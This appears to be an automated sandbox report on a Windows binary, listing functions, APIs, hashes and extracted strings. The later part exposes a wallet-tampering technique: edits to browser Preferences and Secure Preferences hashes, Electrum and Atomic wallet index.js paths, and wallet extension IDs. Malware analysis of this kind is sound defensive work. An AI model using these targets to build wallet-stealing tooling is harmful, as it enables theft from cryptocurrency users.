Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 7337ed8e62dd055f9535e466e8ad91a275852eaa10fcc6b16bd618f4d612e056
Instruction ID: 03b360093a5130d3022186ff81474da0ef46e7b11180c21304d389c9a10b8e52
Opcode Fuzzy Hash: 7337ed8e62dd055f9535e466e8ad91a275852eaa10fcc6b16bd618f4d612e056
Instruction Fuzzy Hash: 5411E521B0964142FA04FB19E25877EA762EF44BC4F955031D70D0BAB6DF7DD5A08350

Function 00007FF7ABC49CEC Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC49D14

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 73303e594dcf2d7f7fcf4ee0bc9beea71639d11a553cf695dfe2529ae579db59
Instruction ID: a8178cc902a055d0aac4aa72dcb63d0a1331187ce7604c491ddcde9a8f552de3
Opcode Fuzzy Hash: 73303e594dcf2d7f7fcf4ee0bc9beea71639d11a553cf695dfe2529ae579db59
Instruction Fuzzy Hash: CB110B31D0E25145FF11BF189405BBDD661AF91B84FD68531E74D076BADFACDA008720

Function 00007FF7ABC4C540 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4C594

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c1ffcc89cb8493f0f8be23ca563807c8961bbd02907f0c7bf9713bdb1fdb5734
Instruction ID: d2371b7d4c480a1deb8d17d4d17f71f5b3b78eaef299a3f9ce68ee57d2890962
Opcode Fuzzy Hash: c1ffcc89cb8493f0f8be23ca563807c8961bbd02907f0c7bf9713bdb1fdb5734
Instruction Fuzzy Hash: E401DB61A0974140EA14FB5A590487EE796FF99FE0F894631EE5C03BF6CE7CD6015310

Function 00007FF7ABC287B0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC3E3AC: FindClose.KERNEL32(?,?,?,?,00007FF7ABC25182), ref: 00007FF7ABC3E3B6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC28816

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: CloseFind_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1011579015-0
Opcode ID: 0bf529d44654acba6db4fde97a959cadf95f411112d3ed8c66c16f42ac226359
Instruction ID: fe46b48f917c1d4b16e838d982a34abf343ddb55610aaf4ddaf4f481adeb5113
Opcode Fuzzy Hash: 0bf529d44654acba6db4fde97a959cadf95f411112d3ed8c66c16f42ac226359
Instruction Fuzzy Hash: 86016D61B2658281EA58EB2DD04577CA362EF44F88FD50032CA0C0B679EE2DD9818314

Function 00007FF7ABC2C350 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF7ABC2C3B2

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: d3401f3e4d2250dd56d37f3cd95b521e13fbbb7dca3d2d63ef4e781712d10a8a
Instruction ID: 75486258a5a28a031042cd182567a5753f60cd20d470492353ee4158f6ca35db
Opcode Fuzzy Hash: d3401f3e4d2250dd56d37f3cd95b521e13fbbb7dca3d2d63ef4e781712d10a8a
Instruction Fuzzy Hash: 57018822B1974181DA00FF1BE4405AA6360FB98FC4F541432EF0D47775CE39D452C750

Function 00007FF7ABC49EDC Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC49F00

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b4b03ac02d2629453174211f4dc61aa90a3c0f5077e4474c0e6e11895f98e5cb
Instruction ID: a3e4b8db4bb117a2a7e81ee867dbf73402bcffa181b3d317c324b8e85f25b3ce
Opcode Fuzzy Hash: b4b03ac02d2629453174211f4dc61aa90a3c0f5077e4474c0e6e11895f98e5cb
Instruction Fuzzy Hash: 6EF0A721B0BB4249FE54FB9ED0C9D79A191AF587C0F958134EA4D83772DE2CF6548720

Function 00007FF7ABC49E7C Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC49EA0

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 4efc3bbd2a2c645fd0db537572d98d8f29f97fe74de9b16cb9f60c23ed73cdf5
Instruction ID: b053c180c2adc3c4c298e3fda6de62795a45b7e254838609aac93980f3d49bbd
Opcode Fuzzy Hash: 4efc3bbd2a2c645fd0db537572d98d8f29f97fe74de9b16cb9f60c23ed73cdf5
Instruction Fuzzy Hash: 1AF0E221B0A70249EE44FB5A91C89B8A150AF59BC0F818030EE4D03372DE2CA6144730

Function 00007FF7ABC4BE50 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4BE6F

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2daa704a1113411147fe56d36985fed32410f3de1735a8b012768dc9e0f98ebf
Instruction ID: deab217c6a4961efd13583e7f389d9f83998e4f765d0ceaae1b33c9cd67ef7a8
Opcode Fuzzy Hash: 2daa704a1113411147fe56d36985fed32410f3de1735a8b012768dc9e0f98ebf
Instruction Fuzzy Hash: 77E0E531A0A64241EA547B7C9288578B1529F407B0F954330E738022F2DF2999504120

Function 00007FF7ABC3E3AC Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(?,?,?,?,00007FF7ABC25182), ref: 00007FF7ABC3E3B6

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 0fd4cc58644b5402a25c0dfa9b3625bd7c8d68a458d4710dc038b73485c4a2e5
Instruction ID: d451a28ff975026a297c95e0d5be6047776c220f089a181672e36a70318faef1
Opcode Fuzzy Hash: 0fd4cc58644b5402a25c0dfa9b3625bd7c8d68a458d4710dc038b73485c4a2e5
Instruction Fuzzy Hash: 0AC08C10E4B403A1ECAC336D0899A70C1906F103B0FD20B34D23E414F1AD1CB49A4B31

Function 00007FF7ABC3E38C Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE ref: 00007FF7ABC3E390

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 659505a9c375cc01c495d22581c13f432a4b6dbd6bc0ee4159a3e7381a1f0396
Instruction ID: 13b76f107e4f06322cdd4c141b6003692169e7576c483a2fe593babc5cf42fcb
Opcode Fuzzy Hash: 659505a9c375cc01c495d22581c13f432a4b6dbd6bc0ee4159a3e7381a1f0396
Instruction Fuzzy Hash: 6CC09214F1B903D2E6983B7B5C92A2991E4BF89761FC28430C10DC0270DE6CA2EB8F31

Function 00007FF7ABC5A168 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF7ABC447BB,?,?,?,?,?,?,?,?,?,00007FF7ABC3EED5), ref: 00007FF7ABC5A1A6

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: c914a04fb4df925cb0be04d76816c22241ac4084935987988ecfb382394f57d2
Instruction ID: c8cf4fc60565e852be2eb93dcafa54d1b48ca6bc7b2430d89b2a600664d76eb9
Opcode Fuzzy Hash: c914a04fb4df925cb0be04d76816c22241ac4084935987988ecfb382394f57d2
Instruction Fuzzy Hash: BCF05E50F8F28B85FE54766A5981B7691805F44BA0F8A4330EC2E862F2DD6CA4808630

Non-executed Functions

Function 00007FF7ABC4F004 Relevance: 49.1, APIs: 25, Strings: 2, Instructions: 1888COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4F33B
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4F59E
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4F861
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4FB01
memcpy_s.LIBCPMT ref: 00007FF7ABC4FD0E
memcpy_s.LIBCPMT ref: 00007FF7ABC4FDAA
memcpy_s.LIBCPMT ref: 00007FF7ABC50262
memcpy_s.LIBCPMT ref: 00007FF7ABC5029D
memcpy_s.LIBCPMT ref: 00007FF7ABC503C9
memcpy_s.LIBCPMT ref: 00007FF7ABC504F0
memcpy_s.LIBCPMT ref: 00007FF7ABC5059B
memcpy_s.LIBCPMT ref: 00007FF7ABC505E3
memcpy_s.LIBCPMT ref: 00007FF7ABC5060D
memcpy_s.LIBCPMT ref: 00007FF7ABC506BE
memcpy_s.LIBCPMT ref: 00007FF7ABC508BE
memcpy_s.LIBCPMT ref: 00007FF7ABC50903
memcpy_s.LIBCPMT ref: 00007FF7ABC509BA
memcpy_s.LIBCPMT ref: 00007FF7ABC50AE7
memcpy_s.LIBCPMT ref: 00007FF7ABC501B2

Part of subcall function 00007FF7ABC51444: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC51476

memcpy_s.LIBCPMT ref: 00007FF7ABC5022D
memcpy_s.LIBCPMT ref: 00007FF7ABC50CA1

Strings

, xrefs: 00007FF7ABC50B94
, xrefs: 00007FF7ABC50A67

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: memcpy_s$_invalid_parameter_noinfo
String ID: $
API String ID: 2880407647-227171996
Opcode ID: 9c06f1f85bf3d5005be47dc3ff6a42340ad58a78e291ba71189e4169d13e8b92
Instruction ID: 532efb310898d3e7129a2369b73633c19b6f3dab60287fd2c7ee6776834fa317
Opcode Fuzzy Hash: 9c06f1f85bf3d5005be47dc3ff6a42340ad58a78e291ba71189e4169d13e8b92
Instruction Fuzzy Hash: B603F772A152C28FE7759F29D990BFE7791FB44388F815135DA0A97B74DB38AA00CB10

Function 00007FF7ABC121C0 Relevance: 41.0, APIs: 7, Strings: 16, Instructions: 728COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12E08
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12E0E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12E6B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12E71
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12E77
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12E83

Strings

data, xrefs: 00007FF7ABC126B8
ios_base::eofbit set, xrefs: 00007FF7ABC12E2B, 00007FF7ABC12EA3
\Secure Preferences, xrefs: 00007FF7ABC12234
Could not write to Secure Preferences file: , xrefs: 00007FF7ABC12B41
+, xrefs: 00007FF7ABC12D82
extensions, xrefs: 00007FF7ABC126DB, 00007FF7ABC12886
Could not open Secure Preferences file: , xrefs: 00007FF7ABC12318
ios_base::failbit set, xrefs: 00007FF7ABC12E24, 00007FF7ABC12E9C
hash, xrefs: 00007FF7ABC12833
Modified Secure Preferences for profile at , xrefs: 00007FF7ABC12D8B
invalid map<K, T> key, xrefs: 00007FF7ABC12DE9
Wallet ID not found in chromeData: , xrefs: 00007FF7ABC12A0F
macs, xrefs: 00007FF7ABC12870
protection, xrefs: 00007FF7ABC12856
settings, xrefs: 00007FF7ABC126F5, 00007FF7ABC1289C
ios_base::badbit set, xrefs: 00007FF7ABC12E18, 00007FF7ABC12E8F

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: +$Could not open Secure Preferences file: $Could not write to Secure Preferences file: $Modified Secure Preferences for profile at $Wallet ID not found in chromeData: $\Secure Preferences$data$extensions$hash$invalid map<K, T> key$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$macs$protection$settings
API String ID: 3668304517-1646890684
Opcode ID: fd04303a9dee5b73214959068a05b5daea200b852c261ae5ac77bfc3c25db181
Instruction ID: 512b15369f593178b65db260a051095ab46c1af4fd29436d3bb5173a38507d38
Opcode Fuzzy Hash: fd04303a9dee5b73214959068a05b5daea200b852c261ae5ac77bfc3c25db181
Instruction Fuzzy Hash: D372A672B16AC249EB20EF28D4447EDA361FB85788FC14132DA5D5BAB9EF38D645C310

Function 00007FF7ABC12EF0 Relevance: 26.9, APIs: 4, Strings: 11, Instructions: 635COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC13914
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1391A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC13976

Strings

ios_base::eofbit set, xrefs: 00007FF7ABC13936, 00007FF7ABC13995
\Preferences, xrefs: 00007FF7ABC12F68
Pinned wallets for profile at , xrefs: 00007FF7ABC138AA
%, xrefs: 00007FF7ABC1365F
Could not write to Preferences file: , xrefs: 00007FF7ABC13668
developer_mode, xrefs: 00007FF7ABC13286
Could not open Preferences file: , xrefs: 00007FF7ABC1304C
extensions, xrefs: 00007FF7ABC13256, 00007FF7ABC1351D
ios_base::failbit set, xrefs: 00007FF7ABC1392F, 00007FF7ABC1398E
ios_base::badbit set, xrefs: 00007FF7ABC13924, 00007FF7ABC13982, 00007FF7ABC139E0
pinned_extensions, xrefs: 00007FF7ABC13537

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: %$Could not open Preferences file: $Could not write to Preferences file: $Pinned wallets for profile at $\Preferences$developer_mode$extensions$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pinned_extensions
API String ID: 3668304517-161018542
Opcode ID: 5a0a88db01a2ae52d9ed0412e4eb19116bdcc8f145b02e007bab939f47e4ca2b
Instruction ID: 55f8c6389bf38e54122dcbc07834dd7ae950b8a3c3101e7a72ac5cb8371e8d4c
Opcode Fuzzy Hash: 5a0a88db01a2ae52d9ed0412e4eb19116bdcc8f145b02e007bab939f47e4ca2b
Instruction Fuzzy Hash: 7E62B132B1AB8295EB10EF28D844BEDA761FB84788F854132DA4D5B7B9DF78D644C310

Function 00007FF7ABC0E4AA Relevance: 25.3, APIs: 3, Strings: 11, Instructions: 775COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E771
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E777

Strings

C:\Users\Public\Desktop\, xrefs: 00007FF7ABC0D929
(User: , xrefs: 00007FF7ABC0CE43
, xrefs: 00007FF7ABC0D58D
Directory: , xrefs: 00007FF7ABC0CC5F
.lnk, xrefs: 00007FF7ABC0D94D
Atomic, xrefs: 00007FF7ABC0D8F9
.zip, xrefs: 00007FF7ABC0D1B4
Wallet: , xrefs: 00007FF7ABC0CC3F
Electrum, xrefs: 00007FF7ABC0D62A
\resources\app\assets\index.js, xrefs: 00007FF7ABC0D680
atomic.exe, xrefs: 00007FF7ABC0DA15

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: Directory: $ $ (User: $.lnk$.zip$Atomic$C:\Users\Public\Desktop\$Electrum$Wallet: $\resources\app\assets\index.js$atomic.exe
API String ID: 3668304517-342767286
Opcode ID: cfbfe38844ac1249446e3b2dc8f8e8cff92513fb2fbe900c48d6925224fc0cb8
Instruction ID: 8b838727aac5f401e49d706ad5a09ca43a5b6cd82185fda2346aeba7cdaec924
Opcode Fuzzy Hash: cfbfe38844ac1249446e3b2dc8f8e8cff92513fb2fbe900c48d6925224fc0cb8
Instruction Fuzzy Hash: F3825672A197C681EA30AB18F0447AEA361FB857A4F914335DAAC07AF9DF7CD184D710

Function 00007FF7ABC0D8A6 Relevance: 25.3, APIs: 3, Strings: 11, Instructions: 775COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC0E2DA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E6DD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E6E3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E6E9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E6FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E701
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E707
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E70D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E71F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E725
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E72B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E731
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E737
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E753
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E759
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E75F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E765
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E76B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E771
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0E777

Strings

C:\Users\Public\Desktop\, xrefs: 00007FF7ABC0D929
(User: , xrefs: 00007FF7ABC0CE43
, xrefs: 00007FF7ABC0D58D
Directory: , xrefs: 00007FF7ABC0CC5F
.lnk, xrefs: 00007FF7ABC0D94D
Atomic, xrefs: 00007FF7ABC0D8F9
.zip, xrefs: 00007FF7ABC0D1B4
Wallet: , xrefs: 00007FF7ABC0CC3F
Electrum, xrefs: 00007FF7ABC0D62A
\resources\app\assets\index.js, xrefs: 00007FF7ABC0D680
atomic.exe, xrefs: 00007FF7ABC0DA15

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
String ID: Directory: $ $ (User: $.lnk$.zip$Atomic$C:\Users\Public\Desktop\$Electrum$Wallet: $\resources\app\assets\index.js$atomic.exe
API String ID: 4261731725-342767286
Opcode ID: e006c58df6e181a62bdbf6a3b1fe6c1ab3205dde32a769c5e87dae4e1891299d
Instruction ID: d423537d2d374c61db4bc58df8f413c8082bf66c239a035b7b83b17b0c439e30
Opcode Fuzzy Hash: e006c58df6e181a62bdbf6a3b1fe6c1ab3205dde32a769c5e87dae4e1891299d
Instruction Fuzzy Hash: B0826672A197C681EA30AB18F0447AEA361FB857A4F914335DAAC07AF9DF7CD184D710

Function 00007FF7ABC013D0 Relevance: 25.2, Strings: 20, Instructions: 210COMMON

Download Yara Rule

Strings

nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 00007FF7ABC01449
lpfcbjknijpeeillifnkikgncikgfhdo, xrefs: 00007FF7ABC01636
1Q8Qas1_ewfzUMTS1hokwKRwiYzLHSrWN, xrefs: 00007FF7ABC015A9
aholpfdialjgjfhomihkjbmgjidlcdno, xrefs: 00007FF7ABC014E2
